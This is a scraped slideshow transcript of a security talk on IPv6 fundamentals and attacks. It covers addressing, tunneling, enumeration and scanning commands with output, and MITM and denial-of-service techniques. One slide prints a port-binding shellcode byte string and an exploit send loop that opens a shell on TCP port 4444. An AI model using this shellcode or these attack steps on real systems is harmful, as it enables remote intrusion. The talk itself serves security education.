Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

IPv6 Fundamentals & Securities


Published on

  • Be the first to comment

IPv6 Fundamentals & Securities

  1. 1. IPv6 Fundamentals & Securities Don Anto IPSECS.COM
  2. 2. Who?• Don Anto• Information security manager• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF• A dead security researcher• Involve in security field for almost 10 years• Genius evil thinker; professional troublemaker• @djantoxz
  3. 3. IPv6 - Why?• Analog to digital convergence (E.G: Voice over IP)• The use of virtualization (E.G: Cloud)• Embedded devices (Smart phone, RFID) networking• All increase the needs of unique IP Address• So, more IP Address spaces are required!• Finally, IPv4 Address Exhaustion
  4. 4. IPv6 - What?• The latest version of Internet Protocol (IP), and is intended to replace IPv4• 128 bit IP Addressing, instead of 32 bit, to multiply IP address space• IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038)• Not using dot decimal anymore, otherwise hexadecimal with colon is used• E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1
  5. 5. IPv6 Fundamentals Source: Fernando Gont Presentation• IPv6 header, 40 Bytes Fixed Length• Source address 16 bytes, destination address 16 bytes• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
  6. 6. IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • RoutingSource: Fernando Gont Presentation
  7. 7. v4 >< v6Source: Fernando Gont Presentation
  8. 8. v4 to v6• Dual-Stack system to support IPv4 & IPv6 concurrently• Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP• Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64)• Free IPv6 Tunnel Broker?
  9. 9. Security Issues• Large space of IPv6 address (enumeration, scanning, managing)• The use of tunneling? The use of dual-stack networking?• Weakness in IPv6 itself? (protocol level vulnerabilities)• Weakness of Application ran on IPv6
  10. 10. Enumeration• Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4• Discovery through ICMPv6 Echo Request Alive: dead:beaf::3• Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1• Discovery through SNMP Query Found 2 systems alive• Google helps us to find IPv6 domains• The presence of IPAM may be help ipv6lab->host -t A has address ipv6lab->host -t AAAA has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
  11. 11. ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 Starting Nmap 5.00 ( ) at 2013-01-15 15:50 WIT Interesting ports on Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)v4 to v6 proxy is usuallyhelpful E.G: Socatapt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)
  12. 12. Perimeter Defense Bypass• Does Firewall protect both IPv4 and IPv6 network?• Does IDS/IPS protect both IPv4 and IPv6 network?• TEREDO tunneling can be used to bypass NAT and to compromise internal network• The use of dual stack and tunneling mandates the protection for IPv4 and IPv6
  13. 13. Perimeter Defense Bypass• IPv4 is well governed by firewall using NAT or policies• Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ• Even worse, someone may directly access the internal network from internet
  14. 14. Exploiting - Protocols• IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement• Some problems in IPv4 is still persistent in IPv6• Man In The Middle Attack• Denial of Services Attack• More and more 
  15. 15. Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more Source Image: OWASP website Used to help packet sniffing
  16. 16. Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95anto# tcpdump -n -i eth0 dst host dead:beaf::320:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 244700 packets captured4884 packets received by filter93 packets dropped by kernel
  17. 17. Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){v4 to v6 proxy is usually printf("cant create socketn"); exit(0);helpful E.G: Socat }apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }
  18. 18. DEMO
  19. 19. Discussion
  20. 20. Thank You